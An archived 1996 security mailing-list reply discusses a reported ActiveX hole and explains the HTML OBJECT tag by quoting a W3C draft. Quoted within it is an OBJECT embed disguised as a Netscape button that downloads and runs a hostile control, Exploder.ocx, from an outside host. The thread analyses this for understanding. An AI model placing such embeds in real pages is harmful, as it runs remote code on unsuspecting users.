Re: ActiveX security hole reported.

• To: CHESS@watson.ibm.com (David M. Chess)
• Subject: Re: ActiveX security hole reported.
• From: Albert-Lunde@nwu.edu (Albert Lunde)
• Date: Tue, 13 Aug 1996 07:53:32 -0500 (CDT)
• Cc: www-security@ns2.rutgers.edu
• In-Reply-To: <199608121759.NAA89585@mailhub1.watson.ibm.com> from "David M. Chess" at Aug 12, 96 01:52:06 pm
• Reply-To: Albert-Lunde@nwu.edu (Albert Lunde)

> This stuff, though:
> 
> <A HREF="http://home.netscape.com/comprod/mirror/index.htm">
> <OBJECT ID="Exploder1" WIDTH=86 HEIGHT=31
>  CODEBASE="http://www.halcyon.com/mclain/ActiveX/Exploder.ocx"
>  CLASSID="CLSID:DE70D9E3-C55A-11CF-8E43-780C02C10128">
>     <PARAM NAME="_Version" VALUE="65536">
>     <PARAM NAME="_ExtentX" VALUE="2646">
>     <PARAM NAME="_ExtentY" VALUE="1323">
>     <PARAM NAME="_StockProps" VALUE="0">
> <IMG SRC="../../images/now20_button.gif" WIDTH=88 HEIGHT=31></OBJECT></A>
> 
> is new to me.  It seems to be instructing IE to download
> the Exploder.ocx binary, and run it (after giving the user
> some little popup warnings to make sure he didn't click
> by accident).  Does anyone have a pointer to the semantics
> of this sort of <OBJECT> tag?

See the W3C draft at:

http://www.w3.org/pub/WWW/TR/WD-object

To quote from it:

- -
Developers have been experimenting with ideas for dealing
with new media: Microsoft's DYNSRC attribute for video and
audio, Netscape's EMBED tag for compound document
embedding, and Sun's APP and APPLET tags for executable
code. 

Each of these proposed solutions attacks the problem from a
slightly different perspective, and on the surface are each very
different. In addition, each of these proposals falls short, in
one way or another, of meeting the requirements of the Web
community as a whole. However, we believe that this problem
can be addressed with a single extension that addresses all of
the current needs, and is fully extensible for the future. 

This specification defines a new tag <OBJECT> which
subsumes the role of the IMG tag, and provides a general
solution for dealing with new media, while providing for
effective backwards compatibility with existing browsers.
OBJECT allows the HTML author to specify the data, and/or
properties/parameters for initializing objects to be inserted into
HTML documents, as well as the code that can be used to
display/manipulate that data. Here, the term object is used to
describe the things that people want to place in HTML
documents, but other terms for these things are: components,
applets, plug-ins, media handlers, etc. 
- -

The W3C got input from various vendors in developing this spec
I think the history of the name of the tag itself is somewhat
confusing, having changed in prior drafts, but the idea of
containing the explosion of special tags that all mean "stick
something here" seems reasonable.

-- 
    Albert Lunde                      Albert-Lunde@nwu.edu

• Re: ActiveX security hole reported.
• From: "David M. Chess" <CHESS@watson.ibm.com>

• Previous: Re: ActiveX security hole reported.
• Next: Re: ActiveX security hole reported.
• Index(es):
  • Index
  • Thread